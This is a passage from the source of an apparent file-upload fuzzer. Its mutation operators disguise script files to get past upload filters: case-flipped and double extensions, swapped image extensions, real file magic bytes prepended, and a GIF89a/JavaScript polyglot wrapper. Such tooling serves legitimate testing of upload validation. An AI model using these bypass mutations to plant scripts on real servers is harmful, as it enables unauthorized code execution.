        (based on the current name, or on utils.extract_filename(seed_file)
        when the current name is None or empty); 'filetype' is whatever
        utils.extract_filetype() returns for ``resource_file``, which
        defaults to self.__resource__["zip"] ('resource/test.zip').
        """
        if resource_file is None:
            resource_file = self.__resource__["zip"]

        name_is_set = output['filename'] is not None and len(output['filename']) > 0
        if not name_is_set:
            root = utils.extract_filename(seed_file)
        else:
            root = output['filename']
        output['filename'] = root + '_M3ZIP'

        output['filetype'] = utils.extract_filetype(resource_file)

--------------------------------------------------------------------------------
/mutation_op/m11.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation11: Case Mutator"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M07','M10', 'M11'], 'html':['M07', 'M10', 'M11','M04_BZ2','M04_XHT','M12_HTML','M12_XHTML'], 'xhtml':['M07', 'M10', 'M08', 'M11', 'M04_BZ2'], 'js':['M10', 'M11','M04_GIF','M04_PNG', 'M04_JPG']}#['M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
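    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["html","js"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Upper-case every even-indexed character of output['fileext'] (M11).

        Example: 'php' -> 'PhP', 'xhtml.php' -> 'XhTmL.PhP'.

        Args:
            output: dict mutated in place. 'filename' becomes the base name
                plus '_M11'; 'fileext' is rewritten as described above.
            seed_file: passed to utils.extract_filename() for the base name
                when output['filename'] is None or empty.
            resource_file: unused.

        This case probes extension checks that compare case-sensitively; a
        validator that normalises case before matching is not affected.
        """
        if output['filename'] != None and len(output['filename']) > 0:
            filename = output['filename']
        else:
            filename = utils.extract_filename(seed_file)

        output['filename'] = filename + '_M11'
        # Parity is counted over the whole string, dots included, and '.' is
        # unchanged by upper(). (An earlier `i == '.'` test compared the int
        # index with a str, so it could never match and never skipped a dot;
        # that unreachable branch is dropped here without changing the result.)
        output['fileext'] = "".join(
            ch.upper() if pos % 2 == 0 else ch
            for pos, ch in enumerate(output['fileext'])
        )

--------------------------------------------------------------------------------
/mutation_op/m12_xhtml.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation12: Double extension"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'xhtml':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX']}# ['M12_JPG', 'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.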
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Prefix output['fileext'] with 'xhtml.' and tag the name (M12XHTML).

        Example: a 'fileext' of 'php' becomes 'xhtml.php'. ``output`` is
        mutated in place; 'filename' becomes the base name plus '_M12XHTML'.
        ``resource_file`` is unused.

        Presumably this probes validators that look at a dot-separated
        component other than the last one; checking the final extension
        against an allowlist covers the case.
        """
        base = output['filename'] or utils.extract_filename(seed_file)
        output['filename'] = base + '_M12XHTML'

        current_ext = output['fileext']
        output['fileext'] = "".join(['xhtml.', current_ext])

--------------------------------------------------------------------------------
/mutation_op/m04_gif.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M12_GIF','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10']}#['M04_JPG', 'M04_PNG', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["php"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Replace the last extension component with 'gif' (M4GIF).

        ``output`` is mutated in place. 'filename' becomes the base name plus
        '_M4GIF'. 'fileext' becomes 'gif' when it holds no dot; otherwise
        everything after the last dot is replaced, e.g. 'xhtml.php' ->
        'xhtml.gif'. 'content' is left as it is. ``resource_file`` is unused.
        """
        existing = output['filename']
        if existing is None or len(existing) == 0:
            base = utils.extract_filename(seed_file)
        else:
            base = existing
        output['filename'] = base + '_M4GIF'

        # rpartition() returns an empty separator when there is no dot at all.
        stem, dot, _ = output['fileext'].rpartition('.')
        output['fileext'] = stem + '.gif' if dot else 'gif'

--------------------------------------------------------------------------------
/mutation_op/m04_png.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M12_PNG','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10']}#['M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {} # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()#["php"] # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Replace the last extension component with 'png' (M4PNG).

        Mutates ``output`` in place: 'filename' gets the suffix '_M4PNG', and
        'fileext' becomes 'png' if it contains no dot, otherwise its part
        after the last dot is swapped for 'png' ('xhtml.php' -> 'xhtml.png').
        Only the name and extension change; 'content' is not touched.
        """
        base = output['filename'] if output['filename'] else utils.extract_filename(seed_file)
        output['filename'] = base + '_M4PNG'

        # A single-element result means the extension had no dot to split on.
        pieces = output['fileext'].rsplit('.', 1)
        if len(pieces) == 1:
            output['fileext'] = 'png'
        else:
            output['fileext'] = pieces[0] + '.png'

--------------------------------------------------------------------------------
/mutation_op/m04_jpg.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
    __mutate_type__ = "file" # (file|request) ; type of target
    __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M12_JPG','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10']}# ['M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
# class mOP body, continued (/mutation_op/m04_jpg.py)
    __resource__ = {}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["php"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Rename the output to '<name>_M4JPG' and make 'jpg' its last extension.

        Only output['filename'] and output['fileext'] are written;
        output['content'] and resource_file are not touched.
        """
        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            # No name chosen yet: derive one from the seed file.
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M4JPG'

        current_ext = output['fileext']
        if '.' in current_ext:
            # Multi-part extension: keep everything before the last dot.
            output['fileext'] = current_ext.rsplit('.', 1)[0] + '.jpg'
        else:
            output['fileext'] = 'jpg'

--------------------------------------------------------------------------------
/mutation_op/m02_jsgif.py:
--------------------------------------------------------------------------------
from mutation_op import *
import struct

class mOP(MutationOP):
    __comment__ = "Mutation2 : set seed in resource file as metadata"
    __mutate_type__ = "file"  # (file|request) ; type of target
    __exclusion_op__ = {'js':['M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_JPG','M04_PNG','M04_GIF']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_JPG', 'M02_PNG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M06', 'M08','M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
# class mOP body, continued (/mutation_op/m02_jsgif.py)
    __resource__ = {}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["js"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Wrap the seed content in a fixed GIF89a byte sequence.

        The prefix built below is put in front of output['content'] and a
        single 0x3B byte is appended; '_M2JSGIF' is added to the file name.
        No resource file is read and resource_file is not used.
        """
        prefix_parts = (
            b'\x47\x49\x46\x38\x39\x61',  # ASCII "GIF89a"
            b'\x2F\x2A',                  # ASCII "/*"
            b'\x0A\x00',
            b'\x00',
            b'\xFF',
            b'\x00',
            b'\x2C\x00\x00\x00\x00\x2F\x2A\x0A\x00\x00\x02\x00\x3B',
            b'\x2A\x2F',                  # ASCII "*/"
            b'\x3D\x31\x3B',              # ASCII "=1;"
        )
        output['content'] = b''.join(prefix_parts) + output['content'] + b'\x3B'

        # NOTE(review): this file imports only mutation_op and struct;
        # `utils` presumably arrives through the star import - confirm.
        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M2JSGIF'

#============================================================================================================#
#======= Script Referenced from : https://pastebin.com/6yUbfGX5 =============================================#
#============================================================================================================#

--------------------------------------------------------------------------------
/mutation_op/m02_pdf.py:
--------------------------------------------------------------------------------
from mutation_op import *

class mOP(MutationOP):
    __comment__ = "Mutation2 : set seed in resource file as metadata"
    __mutate_type__ = "file"  # (file|request) ; type of target
    __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG',
'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M08', 'M10', 'M07_OTHER'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {"jpg":""}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["php","html"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Insert the seed content into ./resource/test.pdf at byte offset 10.

        The inserted block is the bytes 0x25 0xB5 0x61, then the seed
        content, then CR LF. '_M2PDF' is appended to the file name.
        resource_file and __resource__ are not consulted: the template path
        is hard-coded and resolved against the current working directory.
        """
        inserted = b'\x25\xb5\x61' + output['content'] + b'\x0d\x0a'
        with open('./resource/test.pdf', 'rb') as pdf_file:
            template = pdf_file.read()
        output['content'] = template[:10] + inserted + template[10:]

        # NOTE(review): this file imports only mutation_op; `utils`
        # presumably arrives through the star import - confirm.
        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M2PDF'

--------------------------------------------------------------------------------
/mutation_op/m01_jpg.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation1 : set 1024byte from resource file in front of seed"
    __mutate_type__ = "file"  # (file|request) ; type of target
    __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG',
'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {"jpg":"resource/test.jpg"}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["php","html"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Put the first 1024 bytes of a JPG resource in front of the seed content.

        resource_file defaults to __resource__["jpg"]. '_M1JPG' is appended
        to the file name; output['fileext'] is not changed here.
        """
        if resource_file is None:
            resource_file = self.__resource__["jpg"]

        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M1JPG'

        # The output now begins with genuine resource bytes, seed follows.
        leading_bytes = utils.extract_content(resource_file)[:1024]
        output['content'] = leading_bytes + output['content']

--------------------------------------------------------------------------------
/mutation_op/m01_gif.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation1 : set 1024byte from gif resource file in front of seed"
    __mutate_type__ = "file"  # (file|request) ; type of target
    __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG',
'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}
    #['M01_JPG', 'M01_PNG', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08','M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {"gif":"resource/test.gif"}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["php","html"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Put the first 1024 bytes of a GIF resource in front of the seed content.

        resource_file defaults to __resource__["gif"]. '_M1GIF' is appended
        to the file name; output['fileext'] is not changed here.
        """
        if resource_file is None:
            resource_file = self.__resource__["gif"]

        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M1GIF'

        # The output now begins with genuine resource bytes, seed follows.
        leading_bytes = utils.extract_content(resource_file)[:1024]
        output['content'] = leading_bytes + output['content']

--------------------------------------------------------------------------------
/mutation_op/m01_zip.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation1 : set 1024byte from resource file in front of seed"
    __mutate_type__ = "file"  # (file|request) ; type of target
    __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'],
'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}# ['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {"zip":"resource/test.zip"}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["php","html"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Put the first 1024 bytes of a ZIP resource in front of the seed content.

        resource_file defaults to __resource__["zip"]. '_M1ZIP' is appended
        to the file name; output['fileext'] is not changed here.
        """
        if resource_file is None:
            resource_file = self.__resource__["zip"]

        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M1ZIP'

        # The output now begins with genuine resource bytes, seed follows.
        leading_bytes = utils.extract_content(resource_file)[:1024]
        output['content'] = leading_bytes + output['content']

--------------------------------------------------------------------------------
/mutation_op/m01_pdf.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation1 : set 1024byte from resource file in front of seed"
    __mutate_type__ = "file"  # (file|request) ; type of target
    __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP',
'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {"pdf":"resource/test.pdf"}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["php","html"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Put 1024 bytes of a PDF resource, then ">>", in front of the seed content.

        resource_file defaults to __resource__["pdf"]. '_M1PDF' is appended
        to the file name; output['fileext'] is not changed here.
        """
        if resource_file is None:
            resource_file = self.__resource__["pdf"]

        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M1PDF'

        leading_bytes = utils.extract_content(resource_file)[:1024]
        # NOTE(review): ">>" is a text literal; mixing it with the resource
        # bytes assumes Python 2 string semantics - confirm the target runtime.
        output['content'] = leading_bytes + ">>" + output['content']

--------------------------------------------------------------------------------
/mutation_op/m01_png.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation1 : set 1024byte from png resource file in front of seed"
    __mutate_type__ = "file"  # (file|request) ; type of target
    __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ',
'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {"png":"resource/test.png"}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["php","html"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Put the first 1024 bytes of a PNG resource in front of the seed content.

        resource_file defaults to __resource__["png"]. '_M1PNG' is appended
        to the file name; output['fileext'] is not changed here.
        """
        if resource_file is None:
            resource_file = self.__resource__["png"]

        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M1PNG'

        # The output now begins with genuine resource bytes, seed follows.
        leading_bytes = utils.extract_content(resource_file)[:1024]
        output['content'] = leading_bytes + output['content']

--------------------------------------------------------------------------------
/mutation_op/m01_tar_gz.py:
--------------------------------------------------------------------------------
from mutation_op import *
import utils

class mOP(MutationOP):
    __comment__ = "Mutation1 : set 1024byte from resource file in front of seed"
    __mutate_type__ = "file"  # (file|request) ; type of target
    __exclusion_op__ = {'php':['M09','M01_GIF',
'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
    # operations in this list can be used to extra mutation.
    __resource__ = {"targz":"resource/test.tar.gz"}  # ({type:resource filename})
    __seed_dependency__ = __exclusion_op__.keys()  # ["php","html"]  # seed file dependency for operation

    def operation(self, output, seed_file, resource_file=None):
        """Put the first 1024 bytes of a tar.gz resource in front of the seed content.

        resource_file defaults to __resource__["targz"]. '_M1TARGZ' is
        appended to the file name; output['fileext'] is not changed here.
        """
        if resource_file is None:
            resource_file = self.__resource__["targz"]

        base_name = output['filename']
        if base_name is None or len(base_name) == 0:
            base_name = utils.extract_filename(seed_file)
        output['filename'] = base_name + '_M1TARGZ'

        # The output now begins with genuine resource bytes, seed follows.
        leading_bytes = utils.extract_content(resource_file)[:1024]
        output['content'] = leading_bytes + output['content']

--------------------------------------------------------------------------------
/mutation_op/m02_jpg.py:
--------------------------------------------------------------------------------
from mutation_op import *
import struct

class mOP(MutationOP):
    __comment__ = "Mutation2 : set seed in resource file as metadata"
    __mutate_type__ = "file"  # (file|request) ; type of target
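# class mOP body, continued (/mutation_op/m02_jpg.py)
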